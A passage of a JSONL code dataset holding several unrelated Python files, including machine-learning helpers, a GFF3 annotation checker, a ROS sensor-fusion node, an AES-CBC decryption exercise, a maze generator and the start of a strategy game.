initiated\")\n            xgb_model = xgb.XGBRegressor(\n                colsample_bytree=0.1,\n                gamma=0,\n                learning_rate=0.01,\n                max_depth=10,\n                objective='reg:linear',\n                min_child_weight=0.5,\n                n_estimators=1000,\n                reg_alpha=0,\n                reg_lambda=0.45,\n                subsample=0.6,\n                seed=42)\n        if (type == 'binary'):\n            print(\"Binary Classifier initiated\")\n            xgb_model = xgb.XGBClassifier(\n                
learning_rate=0.1,\n n_estimators=1000,\n max_depth=5,\n min_child_weight=1,\n gamma=0,\n subsample=0.8,\n colsample_bytree=0.8,\n objective='binary:logistic',\n nthread=4,\n scale_pos_weight=1,\n seed=27)\n if (type == 'multiclass'):\n print(\"Multiclass Classifier initiated\")\n xgb_model = xgb.XGBClassifier(\n learning_rate=0.1,\n n_estimators=1000,\n max_depth=5,\n min_child_weight=1,\n gamma=0,\n subsample=0.8,\n colsample_bytree=0.8,\n objective='multi:softprob',\n nthread=4,\n scale_pos_weight=1,\n seed=27)\n xgb_model.fit(x_train, y_train,\n eval_set=[(x_train, y_train),\n (x_test, y_test)],\n verbose=True,\n early_stopping_rounds=100)\n return xgb_model\n\n def get_model_stats(model):\n xgb.plot_importance(model)\n plt.rcParams['figure.figsize'] = [50, 50]\n plt.show()\n","sub_path":"XGBoost_kit.py","file_name":"XGBoost_kit.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"428928312","text":"n=int(input())\nA=tuple(map(int, input().split()))\ncnt=0\n\ndef merge_sort(A,cnt):\n m=len(A)\n if m == 1:\n return A,cnt\n else:\n mid=(m+1)//2\n A1=tuple(A[:mid])\n A2=tuple(A[mid:])\n A1,cnt=merge_sort(A1,cnt)\n A2,cnt=merge_sort(A2,cnt)\n n1=len(A1)\n n2=len(A2)\n i1=0\n i2=0\n ans=[0]*(n1+n2)\n j=0\n while j < n1+n2:\n if i1 == n1:\n ans[j]=A2[i2]\n i2+=1\n cnt+=1\n elif i2 == n2:\n ans[j]=A1[i1]\n i1+=1\n cnt+=1\n elif A1[i1] < A2[i2]:\n ans[j]=A1[i1]\n i1+=1\n cnt+=1\n else:\n ans[j]=A2[i2]\n i2+=1\n cnt+=1\n j += 1\n return ans,cnt\n\nsorted_A,cnt=merge_sort(A,0)\nprint(*sorted_A)\nprint(cnt)\n\n \n\n \n","sub_path":"Python_codes/p02272/s143569727.py","file_name":"s143569727.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"537815550","text":"# -*-coding:utf-8-*-\nimport argparse\nimport logging.handlers\nimport os\n\n\ndef logging_config(logging_name=\"video_classification.log\"):\n logging.basicConfig(\n handlers=[logging.handlers.RotatingFileHandler(logging_name, maxBytes=20 * 1024 * 1024, backupCount=5,\n encoding='utf-8')],\n level=logging.INFO,\n format=\"%(asctime)s - %(levelname)s %(filename)s %(funcName)s %(lineno)s - %(message)s\"\n )\n\n\ndef data_preprocess():\n # session_conf = tf.ConfigProto( # CPU GPU等切换\n # allow_soft_placement=True,\n # log_device_placement=False, # 记录设备指派情况; 获取你的 operations 和 Tensor 被指派到哪个设备上运行\n # device_count={'gpu': 0},\n # gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.4), # 高GPU占用情况下依旧运行\n # # 决定每个可见 GPU 应分配到的内存占总内存量的比例。\n # )\n from video_classifacation.data_utils.data_preprocessor import DataPreprocessor\n logging_config(logging_name=\"data_preprocess.log\")\n data_preprocessor = DataPreprocessor()\n data_preprocessor.get_video_label_and_readable_names_file()\n data_preprocessor.un_zip(count=-1) # 负数表示不限制数目\n data_preprocessor.extract_video_to_jpg(count=-1) # 视频 to jpg,负数表示不限制数目\n data_preprocessor.gather_jpg_info_to_excel(count=-1)\n data_preprocessor.extract_features() # 40 jpg to numpy array\n data_preprocessor.gather_features_npy_to_excel() # 从npy文件生成训练测试数据集,依据Config配置的train_count,test_count\n\n\ndef train():\n from video_classifacation.video_classification_01.train import train\n logging_config(logging_name=\"train.log\")\n train()\n\n\ndef predict():\n from video_classifacation.video_classification_01.prediction import Prediction\n from video_classifacation.video_classification_01.config_01 import Config_01 as Config\n 
logging_config(logging_name=\"predict.log\")\n    # saved_model_path = os.path.join(Config.checkpoint_dir, \"lstm.010-2.603.hdf5\")\n    # saved_model_path = os.path.join(Config.checkpoint_dir, \"lstm.009-0.900.hdf5\")\n    predictor = Prediction(load_min_loss_model=True, saved_model_path='')\n    video_path = os.path.join(Config.videos_dir, \"group0\", \"1000370.mp4\")\n    video_path = os.path.join(Config.videos_dir, \"group0\", \"1004770.mp4\")\n    _predict = predictor.predict(video_path)\n    print(_predict)\n    _predict = predictor.readable_predict(video_path)\n    print(_predict)\n\n\ndef main():\n    ''' Parse command line arguments and execute the code'''\n    parser = argparse.ArgumentParser()\n    group = parser.add_mutually_exclusive_group(required=True)  # a mutually exclusive group; at least one of these arguments is required\n    # import video and event\n    group.add_argument('--data_handle', action=\"store_true\")\n    group.add_argument('--train', action=\"store_true\")\n    group.add_argument('--predict', action=\"store_true\")\n\n    args = parser.parse_args()\n\n    if args.data_handle:\n        data_preprocess()\n    elif args.predict:\n        predict()\n    elif args.train:\n        train()\n\n\nif __name__ == '__main__':\n    # data_preprocess()\n    # predict()\n    # train()\n    main()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"535349850","text":"#! /usr/local/bin/python2.7\n# Contributed by Mei-Ju May Chen (2015)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n\nimport sys\nimport re\nimport logging\n# try to import from project first\nfrom os.path import dirname\nif dirname(__file__) == '':\n    lib_path = '../lib'\nelse:\n    lib_path = dirname(__file__) + '/../lib'\nsys.path.insert(1, lib_path)\nfrom gff3_modified import Gff3\nimport function4gff\nimport single_feature\nimport inter_model\nimport intra_model\nimport ERROR\n\n__version__ = '0.0.1'\n\nif __name__ == '__main__':\n    logger_stderr = logging.getLogger(__name__+'stderr')\n    logger_stderr.setLevel(logging.INFO)\n    stderr_handler = logging.StreamHandler()\n    stderr_handler.setFormatter(logging.Formatter('%(levelname)-8s %(message)s'))\n    logger_stderr.addHandler(stderr_handler)\n    logger_null = logging.getLogger(__name__+'null')\n    null_handler = logging.NullHandler()\n    logger_null.addHandler(null_handler)\n    import argparse\n    from textwrap import dedent\n    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description=dedent(\"\"\"\\\n    \n    Testing environment:\n    1. Python 2.7\n\n    Inputs:\n    1. GFF3: Specify the file name with the -g or --gff argument; Please note that this program requires gene/pseudogene, mRNA/pseudogenic_transcript, and exon/pseudogenic_exon to have an ID attribute in column 9. For those features without IDs, it would automatically generate IDs based on the corresponding parent information. However, the ID generation would fail if a feature has multiple parents.\n    2. fasta file: Specify the file name with the -f or --fasta argument\n\n    Outputs:\n    1. 
Error report for the input GFF3 file.\n\n Quick start:\n python2.7 GFF3toolkit/bin/gff-QC.py -g small_files/annotations2.gff -f small_files/sample.fa -o test\n or\n python2.7 GFF3toolkit/bin/gff-QC.py --gff small_files/annotations2.gff --fasta small_files/sample.fa --output test\n\n \"\"\"))\n parser.add_argument('-g', '--gff', type=str, help='Genome annotation file, gff3 format') \n parser.add_argument('-f', '--fasta', type=str, help='Genome sequences, fasta format')\n parser.add_argument('-o', '--output', type=str, help='output file name (default: report.txt)')\n parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)\n \n args = parser.parse_args()\n\n if args.gff:\n logger_stderr.info('Checking gff file (%s)...', args.gff)\n elif not sys.stdin.isatty(): # if STDIN connected to pipe or file\n args.gff = sys.stdin\n logger_stderr.info('Reading from STDIN...')\n else: # no input\n parser.print_help()\n sys.exit(1)\n\n if args.fasta:\n logger_stderr.info('Checking genome fasta (%s)...', args.fasta)\n elif not sys.stdin.isatty(): # if STDIN connected to pipe or file\n args.fasta = sys.stdin\n logger_stderr.info('Reading from STDIN...')\n else: # no input\n parser.print_help()\n sys.exit(1)\n\n\n if args.output:\n logger_stderr.info('Specifying output file name: (%s)...\\n', args.output)\n report_fh = open(args.output, 'wb')\n else:\n report_fh = open('report.txt', 'wb')\n\n\n #ERROR_CODE = ['Esf0001', 'Esf0002', 'Ema0005', 'Emr0001'] \n #ERROR_TAG = ['pseudogene or not?', 'Negative/Zero start/end coordinate', 'unusual child features in the type of pseudogene found', 'Duplicate transcripts found']\n #ERROR_INFO = dict(zip(ERROR_CODE, ERROR_TAG))\n\n '''\n ERROR_INFO = {\n 'Ema0001': 'Parent feature start and end coordinates exceed those of child features',\n 'Ema0002': 'Protein sequence contains stop codons',\n #'Ema0003': 'This feature is not contained within the parent feature coordinates', # Error message has to be modified in gff3_modified.py\n 'Ema0004': 'Incomplete gene feature that should contain at least one mRNA, exon, and CDS',\n 'Ema0005': 'Pseudogene has invalid child feature type',\n #'Ema0006': 'Wrong phase', # Error message has to be modified in gff3_modified.py\n 'Ema0007': 'CDS and parent feature on different strands',\n #'Emr0001': 'Duplicate transcript found', # Error message has to be modified in lib/inter_model/inter_model.py\n 'Emr0002': 'Incorrectly merged gene parent?',\n 'Emr0003': 'Incorrectly split gene parent?',\n 'Emr0004': 'Isoforms that do not share coding sequence',\n #'Emr0005': 'Duplicate ID',\n 'Esf0001': 'Feature type may need to be changed to pseudogene',\n #'Esf0002': '[Start/Stop] is not a valid 1-based integer coordinate: \"[coordinate]\"', # Error message has to be modified in gff3_modified.py\n 'Esf0003': 'strand information missing',\n 'Esf0004': 'Seqid not found in any ##sequence-region',\n 'Esf0005': 'Start is less than the ##sequence-region start',\n 'Esf0006': 'End is greater than the ##sequence-region end',\n 'Esf0007': 'Seqid not found in the embedded ##FASTA',\n 'Esf0008': 'End is greater than the embedded ##FASTA sequence length',\n #'Esf0009': 'Caution: [type] feature (length: [N]) contains [X] consecutive N\\'s (start, length): ([Y], [X])', # Error message has to be modified in gff3_modified.py\n 'Esf0010': 'Seqid not found in the external FASTA file',\n 'Esf0011': 'End is greater than the external FASTA sequence length',\n #'Esf0012': 'Caution: [type] feature (length: [N]) contains [X] consecutive N\\'s 
(start, length): ([Y], [X])', # Error message has to be modified in gff3_modified.py\n    'Esf0013': 'White chars not allowed at the start of a line',\n    'Esf0014': '##gff-version\" missing from the first line',\n    'Esf0015': 'Expecting certain fields in the feature',\n    'Esf0016': '##sequence-region seqid may only appear once',\n    'Esf0017': 'Start/End is not a valid integer',\n    'Esf0018': 'Start is not less than or equal to end',\n    'Esf0019': 'Version is not \"3\"',\n    'Esf0020': 'Version is not a valid integer',\n    'Esf0021': 'Unknown directive',\n    'Esf0022': 'Features should contain 9 fields',\n    'Esf0023': 'escape certain characters',\n    'Esf0024': 'Score is not a valid floating point number',\n    'Esf0025': 'Strand has illegal characters',\n    'Esf0026': 'Phase is not 0, 1, or 2, or not a valid integer',\n    'Esf0027': 'Phase is required for all CDS features',\n    'Esf0028': 'Attributes must escape the percent (%) sign and any control characters',\n    'Esf0029': 'Attributes must contain one and only one equal (=) sign',\n    #'Esf0030': 'Empty attribute tag', # Error message has to be modified in gff3_modified.py\n    #'Esf0031': 'Empty attribute value', # Error message has to be modified in gff3_modified.py\n    #'Esf0032': 'Found multiple attribute tags',\n    'Esf0033': 'Found \", \" in an attribute, possibly unescaped',\n    #'Esf0034': 'attribute has identical values (count, value)', # Error message has to be modified in gff3_modified.py\n    'Esf0035': 'attribute has unresolved forward reference',\n    'Esf0036': 'Value of an attribute contains unescaped \",\"',\n    'Esf0037': 'Target attribute should have 3 or 4 values',\n    'Esf0038': 'Start/End value of Target attribute is not a valid integer coordinate',\n    'Esf0039': 'Strand value of Target attribute has illegal characters',\n    'Esf0040': 'Value of Is_circular attribute is not \"true\"',\n    'Esf0041': 'Unknown reserved (uppercase) attribute'\n    }\n    '''\n\n    logger_stderr.info('Reading gff files: (%s)...\\n', args.gff)\n    gff3 = Gff3(gff_file=args.gff, fasta_external=args.fasta, logger=logger_null)\n    logger_stderr.info('Checking errors in the gff files: (%s)...\\n', args.gff)\n    gff3.check_unresolved_parents()\n    gff3.check_parent_boundary()\n    gff3.check_phase()\n    gff3.check_reference()\n    logger_stderr.info('\\t- Checking missing attributes: (%s)...\\n', 'single_feature.FIX_MISSING_ATTR()')\n\n    error_set = list()\n    if function4gff.extract_internal_detected_errors(gff3):\n        error_set.extend(function4gff.extract_internal_detected_errors(gff3))\n    logger_stderr.info('\\t- Checking intra-model errors: (%s)...\\n', args.gff)\n    if intra_model.main(gff3, logger=logger_stderr):\n        error_set.extend(intra_model.main(gff3, logger=logger_stderr))\n    logger_stderr.info('\\t- Checking inter-model errors: (%s)...\\n', args.gff)\n    if inter_model.main(gff3, logger=logger_stderr):\n        error_set.extend(inter_model.main(gff3, logger=logger_stderr))\n    logger_stderr.info('\\t- Checking single-feature errors: (%s)...\\n', args.gff)\n    if single_feature.main(gff3, logger=logger_stderr):\n        error_set.extend(single_feature.main(gff3, logger=logger_stderr))\n\n    if args.output:\n        logger_stderr.info('Print QC report at {0:s}'.format(args.output))\n    else:\n        logger_stderr.info('Print QC report at {0:s}'.format('report.txt'))\n\n    ERROR_INFO = ERROR.INFO\n\n    report_fh.write('ID\\tError_code\\tError_tag\\n')\n    for e in error_set:\n        tag = '[{0:s}]'.format(e['eTag'])\n        report_fh.write('{0:s}\\t{1:s}\\t{2:s}\\n'.format(str(e['ID']), str(e['eCode']), 
str(tag)))\n","sub_path":"bin/gff-QC.py","file_name":"gff-QC.py","file_ext":"py","file_size_in_byte":9420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"334060342","text":"\n\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom rbm import RBM\nfrom util import sample_bernoulli\n\nclass BBRBMTEMP(RBM):\n def __init__(self, *args, **kwargs):\n RBM.__init__(self, *args, **kwargs)\n self.temp = 1\n def _initialize_vars(self):\n hidden_p = tf.nn.sigmoid(tf.matmul(self.x, self.w) + self.hidden_bias)\n visible_recon_p = tf.nn.sigmoid(tf.matmul(sample_bernoulli(hidden_p), tf.transpose(self.w)) + self.visible_bias)\n hidden_recon_p = tf.nn.sigmoid(tf.matmul(visible_recon_p, self.w) + self.hidden_bias)\n\n positive_grad = tf.matmul(tf.transpose(self.x), hidden_p)\n negative_grad = tf.matmul(tf.transpose(visible_recon_p), hidden_recon_p)\n\n def f(x_old, x_new):\n return self.momentum * x_old +\\\n self.learning_rate * x_new * (1 - self.momentum) / tf.to_float(tf.shape(x_new)[0])\n\n delta_w_new = f(self.delta_w, positive_grad - negative_grad)\n delta_visible_bias_new = f(self.delta_visible_bias, tf.reduce_mean(self.x - visible_recon_p, 0))\n delta_hidden_bias_new = f(self.delta_hidden_bias, tf.reduce_mean(hidden_p - hidden_recon_p, 0))\n\n update_delta_w = self.delta_w.assign(delta_w_new)\n update_delta_visible_bias = self.delta_visible_bias.assign(delta_visible_bias_new)\n update_delta_hidden_bias = self.delta_hidden_bias.assign(delta_hidden_bias_new)\n\n update_w = self.w.assign(self.w + delta_w_new)\n update_visible_bias = self.visible_bias.assign(self.visible_bias + delta_visible_bias_new)\n update_hidden_bias = self.hidden_bias.assign(self.hidden_bias + delta_hidden_bias_new)\n\n self.update_deltas = [update_delta_w, update_delta_visible_bias, update_delta_hidden_bias]\n self.update_weights = [update_w, update_visible_bias, update_hidden_bias]\n #print(\"sel.temp is \", self.temp)\n #if(self.temp == 0.0): #temperature zero\n #print(\"i am inside if-sta of t =0\")\n compute_hidden_real1 = tf.matmul(self.x, self.w) + self.hidden_bias\n compute_hidden_real1 = tf.where(compute_hidden_real1 < 0.0, tf.zeros_like(compute_hidden_real1),compute_hidden_real1)\n compute_hidden_real1 = tf.where(compute_hidden_real1 > 0.0, tf.ones_like(compute_hidden_real1),compute_hidden_real1)\n #pick zero or one randomly when a = 0\n\n if(np.random.uniform(0,1) > 0.5): # binarize the hiddens \n pick_x = tf.ones_like(compute_hidden_real1) #create a tensor of ones with same shape as compute_hidden_real1\n else: \n pick_x = tf.zeros_like(compute_hidden_real1)\n\n compute_hidden_real1 = tf.where(compute_hidden_real1 == 0.0, pick_x,compute_hidden_real1)\n\n #binarize hidden (i think no need to binarize since the above process does that)\n #h_st_bin = tf.math.greater(compute_hidden_real, tf.random.uniform([64]))\n #compute_hidden = tf.cast(h_st_bin, tf.float32)\n self.compute_hidden1 = compute_hidden_real1#compute_hidden########\n #######\n #sigmoid fct for t = 0\n compute_visible_real1 = tf.matmul(self.compute_hidden1, tf.transpose(self.w)) + self.visible_bias\n compute_visible_real1 = tf.where(compute_visible_real1 < 0.0, tf.zeros_like(compute_visible_real1),\n compute_visible_real1)\n compute_visible_real1 = tf.where(compute_visible_real1 > 0.0, tf.ones_like(compute_visible_real1),\n compute_visible_real1)\n # pick zero or one randomly when a = 0\n\n if (np.random.uniform(0, 1) > 0.5):\n pick_x = tf.ones_like(compute_visible_real1)\n else:\n pick_x = 
tf.zeros_like(compute_visible_real1)\n\n compute_visible_real1 = tf.where(compute_visible_real1 == 0.0, pick_x, compute_visible_real1)\n\n #self.compute_visible_real = compute_visible_real\n\n #binarize visual\n #v_st_bin = tf.math.greater(compute_visible_real, tf.random.uniform([794]))\n #compute_visible = tf.cast(v_st_bin, tf.float32)\n self.compute_visible1 = compute_visible_real1 #compute_visible ########\n #else: #temperature other than zero\n #print(\"i am inside else-sta of t not 0\")\n #compute hidden units\n compute_hidden_real2 = tf.nn.sigmoid(tf.math.divide(tf.matmul(self.x, self.w) + self.hidden_bias,self.temp))\n #binarize hidden\n h_st_bin = tf.math.greater(compute_hidden_real2, tf.random.uniform([64]))\n compute_hidden = tf.cast(h_st_bin, tf.float32)\n self.compute_hidden2 = compute_hidden\n #compute the visible units\n compute_visible_real2 = tf.nn.sigmoid(tf.math.divide(tf.matmul(self.compute_hidden2, tf.transpose(self.w)) + self.visible_bias,self.temp))\n # binarize visual\n v_st_bin = tf.math.greater(compute_visible_real2, tf.random.uniform([794]))\n compute_visible2 = tf.cast(v_st_bin, tf.float32)\n self.compute_visible2 = compute_visible2 ########\n ######\n self.compute_visible_from_hidden = tf.nn.sigmoid(tf.matmul(self.y, tf.transpose(self.w)) + self.visible_bias)","sub_path":"tfrbm/bbrbm_temp_backup.py","file_name":"bbrbm_temp_backup.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"189402549","text":"#!/usr/bin/env python\n\n\"\"\"robot_correction.py - Version 1.0 2016-10-12\nAuthor: Jonathan Hodges\n\nThis code calculates the mean and covariance of robot position using\nfused odometry and estimation based on lidar feature matching.\n\nSubscribers:\n /odometry/filtered - robot odometry estimation\n /jfr/robot/pos/lidar - robot position estimation from lidar feature matching.\n\nPublishers:\n /jfr/robot/correction - corrected robot position\n\nThis program is free software; you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation; either version 2 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE. 
See the GNU General Public License for more details at:\nhttp://www.gnu.org/licenses/gpl.html\n\n\"\"\"\n\nimport roslib; roslib.load_manifest('urg_node')\nimport rospy\nimport sensor_msgs.msg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as sc\nimport scipy.signal as sg\nimport scipy.misc as ms\nimport scipy.spatial.distance as scd\nfrom rospy.numpy_msg import numpy_msg\nfrom rospy_tutorials.msg import Floats\nfrom nav_msgs.msg import Odometry\nimport StringIO\nfrom sensor_msgs.msg import Image\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\nimport urllib, base64\nimport os\nimport sys\nimport math\nimport tf\nimport time\nimport scipy.linalg as linalg\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nimport std_msgs.msg\n\nclass robot_correction():\n def __init__(self):\n rospy.init_node('robot_correction', anonymous=True)\n self.cov_publisher = rospy.Publisher('/jfr/robot/correction',PoseWithCovarianceStamped,queue_size=1)\n self.robot_cov = None\n self.lidar_cov = None\n rospy.Subscriber('/odometry/filtered',Odometry, self.cb_rl)\n rospy.Subscriber('/jfr/robot/pos/lidar',PoseWithCovarianceStamped, self.cb_lidar) #lidar matching\n while not rospy.is_shutdown():\n if self.robot_cov is not None and self.lidar_cov is not None:\n self.fusion(np.array(self.robot_cov),np.array(self.lidar_cov),np.array(self.robot_state),np.array(self.lidar_state))\n else:\n rospy.sleep(0.01)\n\n def cb_rl(self, data):\n self.robot_whole_cov = np.array(data.pose.covariance)\n self.robot_state,self.robot_cov = self.pose2state(data.pose)\n \n def cb_lidar(self, data):\n self.lidar_state,self.lidar_cov = self.pose2state(data.pose)\n\n def pose2state(self, pose):\n oppp = pose.pose.position\n oppo = pose.pose.orientation\n #print(np.shape(pose.covariance))\n cov = [[pose.covariance[0],pose.covariance[1],pose.covariance[5]],\n [pose.covariance[6],pose.covariance[7],pose.covariance[11]],\n [pose.covariance[30],pose.covariance[31],pose.covariance[35]]]\n oppoe = tf.transformations.euler_from_quaternion([oppo.x,oppo.y,oppo.z,oppo.w])\n state = np.array([oppp.x,oppp.y,oppoe[2]])\n return state, cov\n\n def state2pose(self, state, cov):\n #print(cov)\n output = PoseWithCovarianceStamped()\n output.pose.pose.position.x = state[0]\n output.pose.pose.position.y = state[1]\n output.pose.pose.position.z = 0\n\n oppo = tf.transformations.quaternion_from_euler(0,0,state[2])\n output.pose.pose.orientation.x = oppo[0]\n output.pose.pose.orientation.y = oppo[1]\n output.pose.pose.orientation.z = oppo[2]\n output.pose.pose.orientation.w = oppo[3]\n new_cov = self.robot_whole_cov\n #print(new_cov)\n new_cov[0] = cov[0]\n new_cov[1] = cov[1]\n new_cov[5] = cov[2]\n new_cov[6] = cov[3]\n new_cov[7] = cov[4]\n new_cov[11] = cov[5]\n new_cov[30] = cov[6]\n new_cov[31] = cov[7]\n new_cov[35] = cov[8]\n output.pose.covariance = new_cov.flatten()\n\n h = std_msgs.msg.Header()\n h.stamp = rospy.Time.now()\n h.frame_id = 'base_link'\n output.header = h\n return output\n\n def fusion(self, robot_cov, lidar_cov, robot_state, lidar_state):\n #print(np.shape(robot_cov),np.shape(lidar_cov))\n c_mat = np.array([[1,0,0],[0,1,0],[0,0,1]])\n #print(\"robot_cov:\")\n #print(robot_cov)\n #print(\"lidar_cov:\")\n #print(lidar_cov)\n\n gain = np.dot(np.dot(robot_cov,c_mat),np.linalg.inv(np.dot(np.dot(c_mat,robot_cov),c_mat.T)+lidar_cov))\n\n #print(\"gain\")\n #print(gain)\n gain[np.isnan(gain)] = 10**-20\n gain = np.reshape(gain,(3,3))\n new_cov = 
np.dot((np.identity(3)-np.dot(gain,c_mat)),np.reshape(robot_cov,(3,3)))\n new_cov = np.reshape(new_cov,(9,))\n new_state = robot_state+np.dot(gain,(lidar_state-np.dot(c_mat,robot_state)))\n #print(lidar_state,robot_state,new_state)\n #print('robot_cov\\t lidar_cov\\t gain\\t\\t new_cov\\t new_x')\n #print('%.4e\\t%.4e\\t%.4e\\t%.4e\\t%.4f'%(robot_cov[0][0],lidar_cov[0][0],gain[0][0],new_cov[0],new_state[0]))\n output = self.state2pose(new_state, new_cov)\n self.cov_publisher.publish(output)\n rospy.sleep(0.02)\n self.robot_cov = None\n self.lidar_cov = None\n\n\nif __name__ == '__main__':\n rospy.loginfo('Looking for object...')\n robot_correction()\n rospy.spin()\n","sub_path":"autonomy/src/robot_correction.py","file_name":"robot_correction.py","file_ext":"py","file_size_in_byte":5459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"420493101","text":"#!/usr/bin/python3\n\nimport base64\nimport re\nimport sys\nfrom Crypto.Cipher import AES\n\n\ndef die(msg, name=sys.argv[0]):\n print('%s:' % name, msg, file=sys.stderr)\n sys.exit(84)\n\n\ndef main(args):\n if len(args) != 2:\n die('invalid number of arguments')\n try:\n with open(args[1], 'r') as f:\n key = bytes.fromhex(re.sub(r'\\s', '', f.readline()))\n iv = bytes.fromhex(re.sub(r'\\s', '', f.readline()))\n data = base64.b64decode(f.read())\n if len(key) == 0 or len (data) == 0:\n raise ValueError()\n if len(iv) != 16 or len(data) % 16 != 0:\n raise ValueError()\n except IOError as e:\n die('cannot open or read file: %s' % e.strerror, name=args[1])\n except ValueError:\n die('invalid data in file', name=args[1])\n\n padding = 16 - (len(data) % 16)\n data += bytes(padding for i in range(padding))\n blocks = [data[i:i+16] for i in range(0, len(data), 16)]\n try:\n aes = AES.new(key, AES.MODE_ECB)\n clear = b''.join(bytes(b ^ v for b, v in zip(aes.decrypt(block), iv)) for block, iv in zip(blocks, [iv] + blocks))\n except ValueError:\n die('invalid key or ciphertext')\n\n print(base64.b64encode(clear[:-clear[-1]]).decode())\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"src/challenge09.py","file_name":"challenge09.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"424617334","text":"import random\nfrom PIL import Image\nimport numpy as np\n\n\nimgx = 500\nimgy = 500\nimage = Image.new(\"RGB\", (imgx, imgy))\npixels = image.load()\nmx = 50\nmy = 50 # width and height of the maze\nmaze = [[0 for x in range(mx)] for y in range(my)]\ndx = [0, 1, 0, -1]\ndy = [-1, 0, 1, 0] # 4 directions to move in the maze\ncolor = [(0, 0, 0), (255, 255, 255),(0, 255, 0),(255, 0, 0)] # RGB colors of the maze\n# start the maze from a random cell\ncx = random.randint(0, mx - 1)\ncy = random.randint(0, my - 1)\nmaze[cy][cx] = 1\nstack = [(cx, cy, 0)] # stack element: (x, y, direction)\n'''\nwhile len(stack) > 0:\n (cx, cy, cd) = stack[-1]\n # to prevent zigzags:\n # if changed direction in the last move then cannot change again\n if len(stack) > 2:\n if cd != stack[-2][2]:\n dirRange = [cd]\n else:\n dirRange = range(4)\n else:\n dirRange = range(4)\n\n # find a new cell to add\n nlst = [] # list of available neighborsimg\n for i in dirRange:\n nx = cx + dx[i]\n ny = cy + dy[i]\n if 0 <= nx < mx and 0 <= ny < my:\n if maze[ny][nx] == 0:\n ctr = 0 # of occupied neighbors must be 1\n for j in range(4):\n ex = nx + dx[j]\n ey = ny + dy[j]\n if 0 <= ex < mx and 0 <= ey < my:\n if maze[ey][ex] == 
1:\n ctr += 1\n if ctr == 1:\n nlst.append(i)\n\n # if 1 or more neighbors available then randomly select one and move\n if len(nlst) > 0:\n ir = nlst[random.randint(0, len(nlst) - 1)]\n cx += dx[ir]\n cy += dy[ir]\n maze[cy][cx] = 1\n stack.append((cx, cy, ir))\n else:\n stack.pop()\n# change it to [0,1] list\nmaze[0][0] = 3 # end point\nmaze[my-1][mx-1] = 2 # start point\n\nfor i in range(len(maze)):\n print maze[i]\n'''\nmaze = np.load('maze.npy')\n\n# save maze in array form\nfor ky in range(imgy):\n for kx in range(imgx):\n pixels[kx, ky] = color[maze[my * ky / imgy][mx * kx / imgx]]\n\n\n#np.save('maze',maze)\n\nimage.show(\"Maze_\" + str(mx) + \"x\" + str(my) + \".png\", \"PNG\")\n\nimage.save(\"Maze_\" + str(mx) + \"x\" + str(my) + \".png\", \"PNG\")","sub_path":"EL_homeWork/maze_generator.py","file_name":"maze_generator.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"69859859","text":"from enum import IntEnum, auto\nfrom camp import Camp\nfrom map import Map_node\n\nimport random, sys\n\nclass Game:\n def __init__(self, map_size, num_camp):\n self.turn = 0\n self.action_dict = [\"BOOST\", \"DRAFT\", \"INVADE\"]\n self.entire_map = self.make_entire_map(map_size)\n self.camps = [Camp(i, self.action_dict, money=10000, mil_power=1000) for i in range(num_camp)]\n for i in range(len(self.entire_map)):\n random.choice(self.get_empty_nodes()).ruler = i\n\n def process(self):\n self.turn += 1\n # ターン開始前処理\n for i in range(len(self.camps)):\n self.camps[i].money += sum([i.prosperity for i in self.get_our_nodes(i)])\n \n for i in range(len(self.camps)):\n choice, target, strength = self.camps[i].action()\n if choice == \"BOOST\":\n if self.camps[i].spend_money(strength):\n self.boost(random.choice(self.get_our_nodes(i)), strength)\n elif choice == \"DRAFT\":\n if self.camps[i].spend_money(strength):\n self.armament(self.camps[i], strength)\n elif choice == \"INVADE\":\n self.invade(self.camps[i], self.camps[target])\n else:\n sys.stderr.writelines(\"存在しないアクションが指定されました:\" + str(i))\n\n return self.isFinished()\n \n def draw(self):\n print(str(self.turn) + \"ターン目\")\n for i in range(len(self.camps)):\n print(\"陣営:\" + self.camps[i].camp_name + \", 領域:\" + str([j.name for j in self.get_our_nodes(i)]) + \\\n \", 資金:\" + str(round(self.camps[i].money)) + \", 軍事力:\" + str(round(self.camps[i].mil_power)) + \", 国力:\" + str(round(self.get_sum_prosperity(i))))\n\n def boost(self, node, money):\n EFFICIENCY = 0.5\n node.prosperity += money * EFFICIENCY\n \n def armament(self, camp, money):\n EFFICIENCY = 1.0\n camp.mil_power += money * EFFICIENCY\n \n def invade(self, attacker, defencer):\n DEF_EFFICIENCY = 2.0\n\n \n def get_node(self, node_id):\n if node_id >= len(self.entire_map):\n sys.stderr.writelines(\"存在しないマップノード番号が指定されました:\" + str(node_id))\n return self.entire_map[node_id]\n \n def 